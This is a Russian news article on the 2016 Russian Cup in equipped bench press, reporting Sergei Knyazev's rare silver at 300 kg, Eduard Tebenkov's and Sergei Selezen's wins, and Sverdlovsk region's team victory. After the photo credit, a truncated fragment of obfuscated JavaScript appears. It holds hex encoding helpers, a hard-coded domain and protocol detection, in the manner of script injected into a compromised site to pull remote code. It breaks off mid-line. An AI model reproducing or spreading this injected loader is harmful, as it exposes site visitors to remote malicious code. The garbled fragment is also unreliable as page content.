Кубок России – 2016 по жиму лежа среди мужчин. Новости,Спорт

 

В конце первого соревновательного дня и весь второй день на помосте Салаватского дворца спорта «Нефтехимик» в экипировочном жиме лежа выступали мужчины. Среди участников были и титулованные спортсмены, которые всего пару дней назад вернулись с чемпионата мира, – Ян Урусов, Сергей Князев, Эдуард Тебеньков, Руслан Павликов и Сергей Селезень.

Весовая категория до 83 кг на кубке России 2016 года стала самой непредсказуемой в результатах. Второе место в весовой категории занял Сергей Князев. Да, это не опечатка. Впервые за последние тринадцать лет лидер российского жима лежа уступил золото на национальных соревнованиях в жиме лежа. Конечно, сказывалась усталость после чемпионата мира, где Сергей до последнего боролся за победу, оставив на помосте все силы. В Салавате свердловский спортсмен стартовал с 300 кг. Дважды этот вес ему не покорился, но в третьем подходе начальный вес все-таки был засчитан. В зачете – 300 кг и уникальная в коллекции наград серебряная медаль.

князев

В весовой категории до 93 кг никто не посягал на лидерские позиции Эдуарда Тебенькова. Чемпион и рекордсмен мира 2016 года уверенно выжал 315 кг и завоевал золотую медаль. В заключительной попытке свердловский спортсмен ходил на 325 кг, но этот вес пока не покорился чемпиону.

тебеньков

Бронзовый призер чемпионата мира 2016 года Сергей Селезень в весовой категории до 120 кг, выходец из Верхней Салды, завоевал золотую медаль кубка России в весовой категории до 120 кг с результатом 320 кг. В заключительном подходе Сергей пытался поднять 355 кг – именно тот вес, который покорился рекордсмену мира этого года Уеде Шинжчи из Японии. К сожалению, штанга застряла в «мертвой» точке и пока не покорилась нашему спортсмену.

селезень в уфе

Примечательно, что все три призера абсолютного первенства являются представителями Свердловской области. Именно этот регион завоевал победу в командном первенстве и выиграл сертификат на 15000 рублей для приобретения оборудования «Lifter500». Второе место в командном зачете заняли спортсмены из республики Башкортостан. Сборная Архангельской области заняли третье место.

фото журнала «Железный Мир»

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vsenovosti24.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Добавить комментарий